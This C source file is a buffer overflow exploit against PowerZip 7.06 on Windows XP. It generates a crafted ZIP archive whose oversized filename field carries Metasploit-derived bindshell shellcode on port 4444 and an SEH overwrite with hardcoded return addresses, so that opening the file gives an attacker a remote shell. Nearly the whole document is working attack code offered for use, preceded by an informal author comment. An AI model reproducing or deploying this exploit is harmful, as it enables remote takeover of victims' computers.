/* PowerZip 7.06 Exploit by bratax (http://www.bratax.be/) Just a quick one as I was able to reuse most of my zipcentral eploit code.. Greetz to everyone I like...(special greetz to mobbie and DT as they were sad I didn't mention them the previous time :p) ****************************** Some technical info: - Original advisory + vulnerability details are available here: http://vuln.sg/powerzip706-en.html (I didn't notice anything like DEP tho?) - some code might look weird in this source.. (e.g. shellcode, offsets,...) this is because a lot of values are changed in memory.. so use your favorite debugger to see the real values and codes - tested on XP Pro English (SP2) and XP Home Dutch (SP2) !! sometimes it works, sometimes it doesn't... (throws exception E06D7363 when it doesn't)... just try over and over and over..... and over.... and over... and over again till it works.. :p sometimes it works 10 times in a row and sometimes you have to try 10 times before it works 1 time.. I'm going to investigate this weekend why this is happening.. but now it's time to relax and drink some beers :) */ #include #include unsigned char scode[]= //bindshell on p4444 (thx metasploit) "\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" "\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37" "\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x38" "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58" "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48" "\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54" "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58" "\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d" "\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38" "\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x45\x4a\x36" "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46" "\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37" "\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e" "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x36\x44\x50" "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45" "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54" "\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41" "\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a" "\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d" "\x42\x35\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36" "\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55" "\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46" "\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c" "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52" "\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f" "\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36" "\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f" "\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" "\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a"; char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00" "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x14\x08\x00"; char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00" "\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00" "\x01\x00\x24\x00\x00\x00\x00\x00\x00"; char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00" "\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00" "\x32\x08\x00\x00\x00"; int main(int argc,char *argv[]) { char overflow[2064]; // exactly 2064....... wonder why? FILE *vuln; if(argc == 1) { printf("PowerZip 7.06 Buffer Overflow Exploit.\n"); printf("Coded by bratax (http://www.bratax.be/).\n"); printf("Usage: %s \n",argv[0]); return 0; } vuln = fopen(argv[1],"w"); //build overflow buffer here. memset(overflow,0x32,sizeof(overflow)); //fill with crap //memcpy(overflow+787, scode, 483); memcpy(overflow+787, scode, 709); memcpy(overflow+1620, "\x41\x49\x89\x04", 4); // jmp over pop pop ret memcpy(overflow+1624, "\x02\x12\x01\x61", 4); // pop pop ret @ 0x61011202 memcpy(overflow+1628, "\x82\xFD\x81\x98\x98", 5); // jmp back to shellcode if(vuln) { //Write file fwrite(head, 1, sizeof(head), vuln); fwrite(overflow, 1, sizeof(overflow), vuln); fwrite(middle, 1, sizeof(middle), vuln); fwrite(overflow, 1, sizeof(overflow), vuln); fwrite(tail, 1, sizeof(tail), vuln); fclose(vuln); } printf("File written.\nOpen with PowerZip 7.06 to exploit.\n"); return 0; }